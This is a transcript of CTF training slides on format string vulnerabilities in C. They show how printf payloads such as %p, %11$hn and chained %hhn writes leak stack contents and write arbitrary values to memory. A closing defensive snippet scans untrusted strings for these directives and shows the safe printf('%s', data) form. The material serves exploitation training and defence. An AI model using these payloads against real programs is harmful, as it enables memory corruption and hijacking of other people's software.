Pwn III

Jesse Huang
December 10, 2018


Binary Exploitation III (Format String Vulnerabilities)
Shared at NTNU CSIE CTF Training Course


Transcript

  1. (Slide 2) Format String?

    • Yes, the C format string:
      ◦ printf("%d", 123);
      ◦ printf("%d %s", 87, "hahaha");
    • How about...
      ◦ printf("%d");
      ◦ printf("%x%x%x%x");
  2. (Slide 3) Format String Vulnerability

    • The format string syntax does not require the number of placeholders (%d, %s, ...) to match the number of arguments.
    • When the placeholder count and the argument count differ, unexpected behaviour results (information leakage).
  3. (Slide 8) Read from arbitrary memory

    printf("%p %3$p %8$p %11$p %13$p");

    [Figure: x86-64 argument layout. rdi holds the format string "%p %3$p ...", rsi, rdx, rcx, ... the remaining register arguments; arg6, arg7, arg8, arg9, arg10, ..., the canary, the saved rbp and the return address follow on the stack.] Any address on the stack can be read this way.
  4. (Slide 9) Read from arbitrary memory

    buf = "%9$saaaa\xEF\xBE\xAD\xDE\x00\x00\x00\x00";
    printf(buf);

    [Figure: the buffer laid out in stack slots: "%9$saaaa", then the address bytes \xEF\xBE\xAD\xDE \x00\x00\x00\x00 at arg7, with arg10, the canary, rbp and ret above.] If the format string itself is on the stack, an address can be embedded in it to read from anywhere; because a \x00 byte inside the address would truncate the string, the address is placed at the end.
  5. (Slide 12) Write to arbitrary memory

    buf = "%16c%11$naaaaaaaa\xEF\xBE\xAD\xDE\x00\x00\x00\x00";
    printf(buf);

    [Figure: the buffer in 8-byte stack slots: "%16c%11$" at arg6, "naaaaaaa" at arg7 and the address \xEF\xBE\xAD\xDE \x00\x00\x00\x00 at arg8.] Goal: write 0x00000010 to 0xdeadbeef. Before the write, 0xDEADBEEF holds 0x12345678.
  6. (Slide 13) Write to arbitrary memory

    Same buffer and layout as slide 12, after the write: 0xDEADBEEF now holds 0x00000010.
  7. (Slide 14) Write to arbitrary memory

    • %n writes an int at a time (4 bytes); if the value to write is large, producing that much output takes a long time.
    • %ln: writes 8 bytes (long)
    • %hn: writes 2 bytes (short)
    • %hhn: writes 1 byte (char)
  8. (Slide 15) Write to arbitrary memory

    buf = "%16c%11$hnaaaaaaa\xEF\xBE\xAD\xDE\x00\x00\x00\x00";
    printf(buf);

    [Figure: the buffer in 8-byte stack slots: "%16c%11$" at arg6, "hnaaaaaa" at arg7 and the address \xEF\xBE\xAD\xDE \x00\x00\x00\x00 at arg8.] Goal: write 0x00000010 to 0xdeadbeef. Before the write, 0xDEADBEEF holds 0x12345678.
  9. (Slide 16) Write to arbitrary memory

    Same buffer and layout as slide 15, after the write: %hn changed only the low 2 bytes, so 0xDEADBEEF now holds 0x12340010.
  10. (Slide 17) Write to arbitrary memory

    buf = "%11$hnaaaaaaaaaaa\xF1\xBE\xAD\xDE\x00\x00\x00\x00";
    printf(buf);

    [Figure: the buffer in 8-byte stack slots: "%11$hnaa" at arg6, "aaaaaaaa" at arg7 and the address \xF1\xBE\xAD\xDE \x00\x00\x00\x00 (0xdeadbef1, the upper half of the target) at arg8.] Goal: write 0x00000010 to 0xdeadbeef. Before the write, 0xDEADBEEF holds 0x12340010.
  11. (Slide 18) Write to arbitrary memory

    Same buffer and layout as slide 17, after the write: no characters were output before %hn, so the upper 2 bytes become 0 and 0xDEADBEEF now holds 0x00000010.
  12. (Slide 20) Write to arbitrary memory

    buf = "%12c%11$hhn%164c%12$hhn%30c%13$hhn%44c%14$hhn\xEF\xBE\xAD\xDE\x00\x00\x00\x00...";
    printf(buf);

    [Figure: the buffer split into 8-byte stack slots from arg6 on ("%12c%11$", "hhn%164c", ..., "%12$hhn%", "30c%13$h", ...), followed by the four addresses \xEF\xBE\xAD\xDE \x00\x00\x00\x00 through \xF2\xBE\xAD\xDE \x00\x00\x00\x00.] Goal: write 0xfaceb00c to 0xdeadbeef. Before the write, 0xDEADBEEF holds 0x12345678.
  13. (Slide 21) Write to arbitrary memory

    Same buffer as slide 20, goal 0xfaceb00c. After the first %hhn: 12 characters output (0x0c), so 0xDEADBEEF holds 0x1234560c.
  14. (Slide 22) Write to arbitrary memory

    Same buffer as slide 20, goal 0xfaceb00c. After the second %hhn: 12 + 164 = 176 characters (0xb0), so 0xDEADBEEF holds 0x1234b00c.
  15. (Slide 23) Write to arbitrary memory

    Same buffer as slide 20, goal 0xfaceb00c. After the third %hhn: 176 + 30 = 206 characters (0xce), so 0xDEADBEEF holds 0x12ceb00c.
  16. (Slide 24) Write to arbitrary memory

    Same buffer as slide 20, goal 0xfaceb00c. After the fourth %hhn: 206 + 44 = 250 characters (0xfa), so 0xDEADBEEF holds 0xfaceb00c.
  17. (Slide 25) Write to arbitrary memory

    • Tips
      ◦ Remember that the character count %n writes is cumulative.
      ◦ If the value to write is smaller than the number of characters already output:
        ▪ add 256 (the byte wraps around, char overflow)
      ◦ Reserving a padding region up front to hold the addresses makes the arithmetic easier.
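The defensive counterpart to slides 3 and 25, added here as an example and not taken from the slides: a scanner that reports which of the directives above (positional N$, the %n family) an untrusted buffer contains, beside the safe way to print such a buffer. The names fmt_report, scan_format, count_writes, count_positional and print_untrusted are chosen for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Scan result (struct and function names are this example's own):
 * argument-consuming directives, %n-family writes, and N$ positional uses. */
struct fmt_report { int conversions, writes, positional; };

/* Walk the string the way printf would: '%' opens a directive of the form
 * %[N$][flags][width][.prec][length]conv, and "%%" is a literal '%'.
 * Returns the number of argument-consuming directives found. */
static int scan_format(const char *s, struct fmt_report *r)
{
    memset(r, 0, sizeof *r);
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                                  /* "%%" */
        const char *start = p;
        while (isdigit((unsigned char)*p)) p++;
        if (*p == '$') { r->positional++; p++; } else p = start;  /* N$ */
        while (*p && strchr("-+ #0", *p)) p++;                    /* flags */
        while (isdigit((unsigned char)*p) || *p == '*') p++;      /* width */
        if (*p == '.') { p++; while (isdigit((unsigned char)*p) || *p == '*') p++; }
        while (*p && strchr("hlLqjzt", *p)) p++;                  /* length */
        if (!*p) break;                         /* string ends mid-directive */
        r->conversions++;
        if (*p == 'n') r->writes++;             /* %n, %hn, %hhn, %ln, ... */
    }
    return r->conversions;
}

static int count_writes(const char *s) { struct fmt_report r; scan_format(s, &r); return r.writes; }
static int count_positional(const char *s) { struct fmt_report r; scan_format(s, &r); return r.positional; }

/* Mitigation: user data is an argument of a fixed format, never the format
 * itself, so a "%11$hn" inside it is printed rather than interpreted.
 * Building with -Wformat-security makes the compiler warn on printf(buf). */
static int print_untrusted(const char *data)
{
    return printf("%s", data);                  /* never printf(data) */
}

int main(void)
{
    const char *buf = "%16c%11$hnaaaaaaa";      /* constructed: slide 15's payload text */
    printf("writes=%d positional=%d\n", count_writes(buf), count_positional(buf));
    return print_untrusted(buf) < 0;            /* prints the text; nothing is written */
}
```

Run over the buffers from the slides it reports 1 write and 1 positional directive for slide 15's text and 4 writes for slide 20's, while print_untrusted outputs them verbatim.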